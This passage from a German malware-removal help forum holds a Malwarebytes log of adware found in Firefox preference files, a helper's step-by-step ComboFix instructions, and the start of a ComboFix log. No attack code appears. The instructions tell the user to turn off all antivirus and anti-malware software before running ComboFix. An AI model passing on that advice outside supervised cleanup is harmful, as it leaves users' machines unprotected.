s.call(aZ,aY)}}X=a(ab);if(ab.addEventListener){aG=function(){ab.removeEventListener(\&quot;DOMContentLoaded\&quot;,aG,false);a.ready()}}else{if(ab.attachEvent){aG=function(){if(ab.readyState===\&quot;complete\&quot;){ab.detachEvent(\&quot;onreadystatechange\&quot;,aG);a.ready()}}}}function x(){if(a.isReady){return}try{ab.documentElement.doScroll(\&quot;left\&quot;)}catch(aY){setTimeout(x,1);return}a.ready()}function aV(aY,aZ){if(aZ.src){a.ajax({url:aZ.src,async:false,dataType:\&quot;script\&quot;})}else{a.globalEval(aZ.text||aZ.textContent||aZ.innerHTML||\&quot;\&quot;)}if(aZ.parentNode){aZ.parentNode.removeChild(aZ)}}function an(aY,a6,a4,a0,a3,a5){var aZ=aY.length;if(typeof a6===\&quot;object\&quot;){for(var a1 in a6){an(aY,a1,a6[a1],a0,a3,a4)}return aY}if(a4!==C){a0=!a5&amp;&amp;a0&amp;&amp;a.isFunction(a4);for(var a2=0;a2&lt;aZ;a2++){a3(aY[a2],a6,a0?a4.call(aY[a2],a2,a3(aY[a2],a6)):a4,a5)}return aY}return aZ?a3(aY[0],a6):C}function aP(){return(new Date).getTime()}(function(){a.support={};var a4=ab.documentElement,a3=ab.createElement(\&quot;script\&quot;),aY=ab.createElement(\&quot;div\&quot;),aZ=\&quot;script\&quot;+aP();aY.style.display=\&quot;none\&quot;;aY.innerHTML=\&quot;   &lt;link/&gt;&lt;table&gt;&lt;/table&gt;&lt;a href=&apos;/a&apos; style=&apos;color:red;float:left;opacity:.55;&apos;&gt;a&lt;/a&gt;&lt;input type=&apos;checkbox&apos;/&gt;\&quot;;var a6=aY.getElementsByTagName(\&quot;*\&quot;),a5=aY.getElementsByTagName(\&quot;a\&quot;)[0];if(!a6||!a6.length||!a5){return}a.support={leadingWhitespace:aY.firstChild.nodeType===3,tbody:!aY.getElementsByTagName(\&quot;tbody\&quot;).length,htmlSerialize:!!aY.getElementsByTagName(\&quot;link\&quot;).length,style:/red/.test(a5.getAttribute(\&quot;style\&quot;)),hrefNormalized:a5.getAttribute(\&quot;href\&quot;)===\&quot;/a\&quot;,opacity:/^0.55$/.test(a5.style.opacity),cssFloat:!!a5.style.cssFloat,checkOn:aY.getElementsByTagName(\&quot;input\&quot;)[0].value===\&quot;on\&quot;,optSelected:ab.createElement(\&quot;select\&quot;).appendChild(ab.createElement(\&quot;option\&quot;)).selected,parentNode:aY.removeChild(aY.appendChild(ab.createElement(\&quot;div\&quot;))).parentNode===null,deleteExpando:true,checkClone:false,scriptEval:false,noCloneEvent:true,boxModel:null};a3.type=\&quot;text/javascript\&quot;;try{a3.appendChild(ab.createTextNode(\&quot;window.\&quot;+aZ+\&quot;=1;\&quot;))}catch(a1){}a4.insertBefore(a3,a4.firstChild);if(aM[aZ]){a.support.scriptEval=true;delete aM[aZ]}try{delete a3.test}catch(a1){a.support.deleteExpando=false}a4.removeChild(a3);if(aY.attachEvent&amp;&amp;aY.fireEvent){aY.attachEvent(\&quot;onclick\&quot;,function a7(){a.support.noCloneEvent=false;aY.detachEvent(\&quot;onclick\&quot;,a7)});aY.cloneNode(true).fireEvent(\&quot;onclick\&quot;)}aY=ab.createElement(\&quot;div\&quot;);aY.innerHTML=\&quot;&lt;input type=&apos;radio&apos; name=&apos;radiotest&apos; checked=&apos;checked&apos;/&gt;\&quot;;var a0=ab.createDocumentFragment();a0.appendChild(aY.firstChild);a.support.checkClone=a0.cloneNode(true).cloneNode(true).lastChild.checked;a(function(){var a8=ab.createElement(\&quot;div\&quot;);a8.style.width=a8.style.paddingLeft=\&quot;1px\&quot;;ab.body.appendChild(a8);a.boxModel=a.support.boxModel=a8.offsetWidth===2;ab.body.removeChild(a8).style.display=\&quot;none\&quot;;a8=null});var a2=function(a8){try{var ba=ab.createElement(\&quot;div\&quot;);a8=\&quot;on\&quot;+a8;var a9=(a8 in ba);if(!a9){ba.setAttribute(a8,\&quot;return;\&quot;);a9=typeof ba[a8]===\&quot;function\&quot;}ba=null;return a9}catch(bb){return false}};a.support.submitBubbles=a2(\&quot;submit\&quot;);a.support.changeBubbles=a2(\&quot;change\&quot;);a4=a3=aY=a6=a5=null})();a.props={\&quot;for\&quot;:\&quot;htmlFor\&quot;,\&quot;class\&quot;:\&quot;className\&quot;,readonly:\&quot;readOnly\&quot;,maxlength:\&quot;maxLength\&quot;,cellspacing:\&quot;cellSpacing\&quot;,rowspan:\&quot;rowSpan\&quot;,colspan:\&quot;colSpan\&quot;,tabindex:\&quot;tabIndex\&quot;,usemap:\&quot;useMap\&quot;,frameborder:\&quot;frameBorder\&quot;};var aI=\&quot;jQuery\&quot;+aP(),aH=0,aT={};a.extend({cache:{},expando:aI,noData:{embed:true,object:true,applet:true},data:function(a0,aZ,a2){if(a0.nodeName&amp;&amp;a.noData[a0.nodeName.toLowerCase()]){return}a0=a0==aM?aT:a0;var a3=a0[aI],aY=a.cache,a1;if(!a3&amp;&amp;typeof aZ===\&quot;string\&quot;&amp;&amp;a2===C){return null}if(!a3){a3=++aH}if(typeof aZ===\&quot;object\&quot;){a0[aI]=a3;a1=aY[a3]=a.extend(true,{},aZ)}else{if(!aY[a3]){a0[aI]=a3;aY[a3]={}}}a1=aY[a3];if(a2!==C){a1[aZ]=a2}return typeof aZ===\&quot;string\&quot;?a1[aZ]:a1},removeData:function(a0,aZ){if(a0.nodeName&amp;&amp;a.noData[a0.nodeName.toLowerCase()]){return}a0=a0==aM?aT:a0;var a2=a0[aI],aY=a.cache,a1=aY[a2];if(aZ){if(a1){delete a1[aZ];if(a.isEmptyObject(a1)){a.removeData(a0)}}}else{if(a.support.deleteExpando){delete a0[a.expando]}else{if(a0.removeAttribute){a0.removeAttribute(a.expando)}}delete aY[a2]}}});a.fn.extend({data:function(aY,a0){if(typeof aY===\&quot;undefined\&quot;&amp;&amp;this.length){return a.data(this[0])}else{if(typeof aY===\&quot;object\&quot;){return this.each(function(){a.data(this</baddata><gooddata></gooddata><hash>c0197829d4b71224398a8911b74def11</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>}else{if(typeof aY===\&quot;object\&quot;){return this.each(function(){a.data(this,aY)})}}var a</baddata><gooddata></gooddata><hash>b8216a37701bac8a33905a407f85c838</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>le.
 *
 * If you make changes to this file while the application is r</baddata><gooddata></gooddata><hash>7861069bbbd00135e1e2fd9dc242c53b</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>t edit this file.
 *
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 */
         

Alt 07.12.2015, 09:21   #13
Polte
 
WIN 7 Firewall nicht aktivierbar/Avira meldet Funde - Standard

WIN 7 Firewall nicht aktivierbar/Avira meldet Funde



Teil 8

Code:
ATTFilter
user_pref(&quot;accessibility.typeaheadfind.flashBar&quot;, 0);
user_pref(&quot;app.update.lastUpdateTime.addon-background-update-timer&quot;, 1449326518);
user_pref(&quot;app.update.lastUpdateTime.background-update-timer&quot;, 1449310788);
user_pref(&quot;app.update.lastUpdateTime.blocklist-background-update-timer&quot;, 1449324908);
user_pref(&quot;app.update.lastUpdateTime.browser-cleanup-thumbnails&quot;, 1449353054);
user_pref(&quot;app.update.lastUpdateTime.experiments-update-timer&quot;, 1449326398);
user_pref(&quot;app.update.lastUpdateTime.search-engine-update-timer&quot;, 1449343906);
user_pref(&quot;app.update.lastUpdateTime.xpi-signature-verification&quot;, 1449326278);
user_pref(&quot;app.update.migrated.updateDir&quot;, true);
user_pref(&quot;browser.bookmarks.restore_default_bookmarks&quot;, false);
user_pref(&quot;browser.cache.disk.capacity&quot;, 0);
user_pref(&quot;browser.cache.disk.filesystem_reported&quot;, 1);
user_pref(&quot;browser.cache.disk.smart_size.enabled&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size.first_run&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size.use_old_max&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size_cached_value&quot;, 358400);
user_pref(&quot;browser.cache.frecency_experiment&quot;, 3);
user_pref(&quot;browser.customizemode.tip0.shown&quot;, true);
user_pref(&quot;browser.download.importedFromSqlite&quot;, true);
user_pref(&quot;browser.download.manager.retention&quot;, 0);
user_pref(&quot;browser.download.panel.firstSessionCompleted&quot;, true);
user_pref(&quot;browser.download.panel.shown&quot;, true);
user_pref(&quot;browser.download.save_converter_index&quot;, 0);
user_pref(&quot;browser.feeds.showFirstRunUI&quot;, false);
user_pref(&quot;browser.formfill.enable&quot;, false);
user_pref(&quot;browser.hotfix.v20150225.01.complete&quot;, true);
user_pref(&quot;browser.migration.version&quot;, 30);
user_pref(&quot;browser.newtabpage.blocked&quot;, &quot;{\&quot;IoDyuodwFMMBuEJuNT5LZA==\&quot;:1,\&quot;2/Jajwm5xLUkQYEtqKKJuA==\&quot;:1,\&quot;5XYqhwwFl8Nm3aa/bzTEXA==\&quot;:1,\&quot;XN0gzX5CZdmIYOEKmV0GVA==\&quot;:1,\&quot;Fxqb5qY5liKaWb0nxW1VIQ==\&quot;:1,\&quot;5dPX2t2Xtq7V1dnRJu5irg==\&quot;:1,\&quot;fN+l9WzvM5iUCIvEhEOYEQ==\&quot;:1,\&quot;JsXUxU9t1wOIlkZ9TyVEsg==\&quot;:1,\&quot;er4xCOhSuEoh6/Q+OsASGw==\&quot;:1,\&quot;ewuiteJbUq/F9Zuy9EJhMA==\&quot;:1}&quot;);
user_pref(&quot;browser.newtabpage.enhanced&quot;, true);
user_pref(&quot;browser.newtabpage.introShown&quot;, true);
user_pref(&quot;browser.newtabpage.storageVersion&quot;, 1);
user_pref(&quot;browser.pagethumbnails.storage_version&quot;, 3);
user_pref(&quot;browser.places.smartBookmarksVersion&quot;, 7);
user_pref(&quot;browser.preferences.advanced.selectedTabIndex&quot;, 3);
user_pref(&quot;browser.privatebrowsing.autostart&quot;, true);
user_pref(&quot;browser.reader.detectedFirstArticle&quot;, true);
user_pref(&quot;browser.rights.3.shown&quot;, true);
user_pref(&quot;browser.search.countryCode&quot;, &quot;DE&quot;);
user_pref(&quot;browser.search.isUS&quot;, false);
user_pref(&quot;browser.search.region&quot;, &quot;DE&quot;);
user_pref(&quot;browser.search.selectedEngine&quot;, &quot;Google&quot;);
user_pref(&quot;browser.sessionstore.upgradeBackup.latestBuildID&quot;, &quot;20140923175406&quot;);
user_pref(&quot;browser.shell.mostRecentDateSetAsDefault&quot;, &quot;1449386344&quot;);
user_pref(&quot;browser.slowStartup.averageTime&quot;, 0);
user_pref(&quot;browser.slowStartup.notificationDisabled&quot;, true);
user_pref(&quot;browser.slowStartup.samples&quot;, 0);
user_pref(&quot;browser.startup.homepage&quot;, &quot;www.google.de&quot;);
user_pref(&quot;browser.startup.homepage_override.buildID&quot;, &quot;20151029151421&quot;);
user_pref(&quot;browser.startup.homepage_override.mstone&quot;, &quot;42.0&quot;);
user_pref(&quot;browser.syncPromoViewsLeftMap&quot;, &quot;{\&quot;bookmarks\&quot;:4}&quot;);
user_pref(&quot;browser.tabs.warnOnClose&quot;, false);
user_pref(&quot;browser.taskbar.lastgroupid&quot;, &quot;E7CF176E110C211B&quot;);
user_pref(&quot;browser.toolbarbuttons.in</baddata><gooddata></gooddata><hash>0fca2f72e9a21026a1225b3ff90b46ba</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>astgroupid&quot;, &quot;E7CF176E110C211B&quot;);
user_pref(&quot;browser.toolbarbuttons.introduced.pocket-button&quot;</baddata><gooddata></gooddata><hash>8653d4cd7318dc5a06bd2a70d92b7090</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> * If you make changes to this file while the application is running,
 </baddata><gooddata></gooddata><hash>7663821f424947ef992aecae3cc8b64a</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> edit this file.
 *
 * If you make changes to this file while the application is running,
 </baddata><gooddata></gooddata><hash>8f4a475acbc06ccaf0d3801a25dfba46</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> * If you make changes to this file while the application is running,
 * the changes will be overwritten when</baddata><gooddata></gooddata><hash>7069b7eadbb0ec4ab80be4b659ab6f91</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>hanges to this file while the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a man</baddata><gooddata></gooddata><hash>61786938a7e4fd393b880b8f5aaa1de3</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> application is running,
 * the changes will be overwritten when </baddata><gooddata></gooddata><hash>0bce920fe0abcd69ebd86c2eba4a4bb5</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>Do not edit this file.
 *
 * If you make changes to this file while</baddata><gooddata></gooddata><hash>5584aaf7e3a8ad8917ace0ba4cb88878</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>not edit this file.
 *
 * If you make changes to this file wh</baddata><gooddata></gooddata><hash>2aaf277a434840f6299a0e8c08fc07f9</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>/* Do not edit this file.
 *
 * If you make changes to this fi</baddata><gooddata></gooddata><hash>c316b9e87a11023416ad4f4b4cb8728e</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>* Do not edit this file.
 *
 * If you make changes to this fi</baddata><gooddata></gooddata><hash>4297851c127990a6655e2872c63ee818</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>/* Do not edit this file.
 *
 * If you make changes to thi</baddata><gooddata></gooddata><hash>bb1ee1c0f596c27423a05a408f75af51</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>

/* Do not edit this file.
 *
 * If you make changes to this fi</baddata><gooddata></gooddata><hash>40998d14d3b80f27497aa2f88183c937</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>o not edit this file.
 *
 * If you make changes to th</baddata><gooddata></gooddata><hash>a435f9a86e1d6fc7586b7f1bdf2503fd</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>nces

/* Do not edit this file.
 *
 * If you make chan</baddata><gooddata></gooddata><hash>4594f2af1d6e47ef447f41598b796799</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>s

/* Do not edit this file.
 *
 * If you make chan</baddata><gooddata></gooddata><hash>55847c25414a3afcd0f3247626de9e62</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>nces

/* Do not edit this file.
 *
 * If you make changes to this file while t</baddata><gooddata></gooddata><hash>efea4d54a2e94fe72d96eab0778d9b65</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> file.
 *
 * If you make changes to this file whil</baddata><gooddata></gooddata><hash>5980029f9bf043f30bb84a50877d6e92</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>erences

/* Do not edit this file.
 *
 * If you make c</baddata><gooddata></gooddata><hash>6079a9f8c2c9c96d4f74fd9d32d2e11f</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>s

/* Do not edit this file.
 *
 * If you make changes to th</baddata><gooddata></gooddata><hash>80590e93840768ce02c1fe9c0cf8837d</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>* Do not edit this file.
 *
 * If you make changes to this file while</baddata><gooddata></gooddata><hash>d504138e3c4fd4625d66cbcf3bc9ed13</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>t edit this file.
 *
 * If you make changes to this file whi</baddata><gooddata></gooddata><hash>9247a4fdbad1c76fcaf93763b84c9b65</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>
/* Do not edit this file.
 *
 * If you make changes to this fil</baddata><gooddata></gooddata><hash>6178930e25662d0921a23d5d06febf41</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>Do not edit this file.
 *
 * If you make changes to this file w</baddata><gooddata></gooddata><hash>8455f2afd4b742f41ea5594114f03cc4</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> Do not edit this file.
 *
 * If you make changes to this fi</baddata><gooddata></gooddata><hash>77626140484326107f441e7c9a6a24dc</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\user.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>user_pref(&quot;extensions.BabylonToolbar_i.babTrack&quot;, &quot;affID=110819&amp;tt=010712_3&quot;);</baddata><gooddata></gooddata><hash>73663a67800bd561ddb17d1df90be61a</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\user.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>);
user_pref(&quot;privacy.clearOnShutdown.cookies&quot;, fal</baddata><gooddata></gooddata><hash>7f5a1d84840757df236b7624867e15eb</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\user.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>.cookie.cookieBehavior&quot;, 0);
user_pref(&quot;privacy.clear</baddata><gooddata></gooddata><hash>9247554c67241323b2dc3b5f36ce3bc5</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\user.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>ookie.cookieBehavior&quot;, 0);
user_pref(&quot;privacy.clearOnShutdown.cookies&quot;, false);</baddata><gooddata></gooddata><hash>fadf425f296242f45737574345bfe020</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\user.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>
user_pref(&quot;privacy.clearOnShutdown.cookies&quot;, false);
user_pref(&quot;security.warn_vie</baddata><gooddata></gooddata><hash>fddc7d24434852e40589108a21e3ca36</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\user.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>er_pref(&quot;privacy.clearOnShutdown.cookies&quot;, false);
user_pr</baddata><gooddata></gooddata><hash>f2e7adf46724eb4b2a64c4d6907404fc</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\user.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>.cookieBehavior&quot;, 0);
user_pref(&quot;privacy.clearOnShutdown.</baddata><gooddata></gooddata><hash>499081205b30171fcfbfd9c1bb497a86</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\user.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>e.cookieBehavior&quot;, 0);
user_pref(&quot;privacy.clearOnShutdown.</baddata><gooddata></gooddata><hash>6c6d2879ef9c1b1b8a04b9e17193a957</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\user.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>.cookieBehavior&quot;, 0);
user_pref(&quot;privacy.clearOnShutdown.cookies&quot;, </baddata><gooddata></gooddata><hash>a5342a77266567cf632b3a6032d257a9</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\user.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>havior&quot;, 0);
user_pref(&quot;privacy.clearOnShutdown.cookies&quot;, f</baddata><gooddata></gooddata><hash>7e5b871acbc069cdfe9097039a6a6a96</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\user.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>cookieBehavior&quot;, 0);
user_pref(&quot;privacy.clearOnShutdown.cookies&quot;</baddata><gooddata></gooddata><hash>44957e230c7fd75fa7e73763b74da060</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\user.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>eBehavior&quot;, 0);
user_pref(&quot;privacy.clearOnShutdown.cook</baddata><gooddata></gooddata><hash>5881960bf89392a42e603a60b94b08f8</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\user.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>kie.cookieBehavior&quot;, 0);
user_pref(&quot;privacy.clearOnShutd</baddata><gooddata></gooddata><hash>32a7831eaae1e1555e30cfcb02025ea2</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\user.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>ie.cookieBehavior&quot;, 0);
user_pref(&quot;privacy.clearOnShut</baddata><gooddata></gooddata><hash>e7f21190f59670c6fb933862b64ef907</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\user.js</path><vendor>PUP.Optional.Babylon</vendor><action>replaced</action><baddata>okie.cookieBehavior&quot;, 0);
user_pref(&quot;privacy.clearOnShut</baddata><gooddata></gooddata><hash>f3e6821fff8cbf77b0de8d0d3cc84ab6</hash></file>
</items>
</mbam-log>
         

Ich hoffe das dies jetzt so in Ordnung war. Danke für deine Nachsicht und Geduld

Alt 07.12.2015, 09:34   #14
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
WIN 7 Firewall nicht aktivierbar/Avira meldet Funde - Standard

WIN 7 Firewall nicht aktivierbar/Avira meldet Funde



Dann bitte jetzt Combofix ausführen:

Scan mit Combofix
WARNUNG an die MITLESER:
Combofix sollte ausschließlich ausgeführt werden, wenn dies von einem Teammitglied angewiesen wurde!

Downloade dir bitte Combofix vom folgenden Downloadspiegel: Link
  • WICHTIG: Speichere Combofix auf deinem Desktop.
  • Deaktiviere bitte alle deine Antivirensoftware sowie Malware/Spyware Scanner. Diese können Combofix bei der Arbeit stören. Combofix meckert auch manchmal trotzdem noch, das kannst du dann ignorieren, mir aber bitte mitteilen.
  • Starte die Combofix.exe und folge den Anweisungen auf dem Bildschirm.
  • Während Combofix läuft bitte nicht am Computer arbeiten, die Maus bewegen oder ins Combofixfenster klicken!
  • Wenn Combofix fertig ist, wird es ein Logfile erstellen.
  • Bitte poste die C:\Combofix.txt in deiner nächsten Antwort (möglichst in CODE-Tags).
Hinweis: Solltest du nach dem Neustart folgende Fehlermeldung erhalten
Es wurde versucht, einen Registrierungsschlüssel einem ungültigen Vorgang zu unterziehen, der zum Löschen markiert wurde.
starte den Rechner einfach neu. Dies sollte das Problem beheben.

__________________
Logfiles bitte immer in CODE-Tags posten

Alt 07.12.2015, 11:37   #15
Polte
 
WIN 7 Firewall nicht aktivierbar/Avira meldet Funde - Standard

WIN 7 Firewall nicht aktivierbar/Avira meldet Funde



Code:
ATTFilter
ComboFix 15-12-07.01 - Steffen 07.12.2015  11:06:13.1.4 - x64
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.49.1031.18.6124.4458 [GMT 1:00]
ausgeführt von:: c:\users\Steffen\Downloads\ComboFix.exe
AV: Avira Antivirus *Disabled/Updated* {4D041356-F94D-285F-8768-AAE50FA36859}
AV: Microsoft Security Essentials *Disabled/Updated* {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
SP: Avira Antivirus *Disabled/Updated* {F665F2B2-DF77-27D1-BDD8-9197742422E4}
SP: Microsoft Security Essentials *Disabled/Updated* {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((((((((((((((   Weitere Löschungen   ))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\users\Steffen\AppData\Local\Temp\avgnt.exe\Avira.OE.ExtApi.dll
c:\users\Steffen\AppData\Roaming\system32
c:\windows\security\logs\scecomp.log
c:\windows\SysWow64\DEBUG.log
.
.
(((((((((((((((((((((((   Dateien erstellt von 2015-11-07 bis 2015-12-07  ))))))))))))))))))))))))))))))
.
.
2015-12-07 10:20 . 2015-12-07 10:20	75888	----a-w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{A07B6A54-5F91-456E-A52E-308E8C855C31}\offreg.936.dll
2015-12-07 09:03 . 2015-12-07 09:03	75888	----a-w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{A07B6A54-5F91-456E-A52E-308E8C855C31}\offreg.948.dll
2015-12-07 08:27 . 2015-12-07 08:27	--------	d-s---w-	c:\windows\system32\CompatTel
2015-12-07 08:27 . 2015-12-07 08:27	--------	d-----w-	c:\windows\system32\appraiser
2015-12-07 08:27 . 2015-12-07 08:27	--------	d-----w-	c:\windows\Migration
2015-12-07 08:02 . 2015-12-07 08:02	--------	d-----w-	c:\windows\system32\SPReview
2015-12-07 08:01 . 2015-12-07 08:01	--------	d-----w-	c:\windows\system32\EventProviders
2015-12-06 17:59 . 2015-09-18 16:47	766464	----a-w-	c:\windows\system32\generaltel.dll
2015-12-06 17:59 . 2015-01-27 23:23	1239720	----a-w-	c:\windows\system32\aitstatic.exe
2015-12-06 17:59 . 2015-09-18 16:47	700416	----a-w-	c:\windows\system32\invagent.dll
2015-12-06 17:59 . 2015-09-18 16:47	503808	----a-w-	c:\windows\system32\devinv.dll
2015-12-06 17:59 . 2015-09-18 16:47	73216	----a-w-	c:\windows\system32\acmigration.dll
2015-12-06 17:58 . 2012-07-06 20:07	552960	----a-w-	c:\windows\system32\drivers\bthport.sys
2015-12-06 17:08 . 2015-06-24 14:00	1190000	----a-w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{A868FB81-9B2C-46E0-96EE-8FCC6566EAD2}\gapaengine.dll
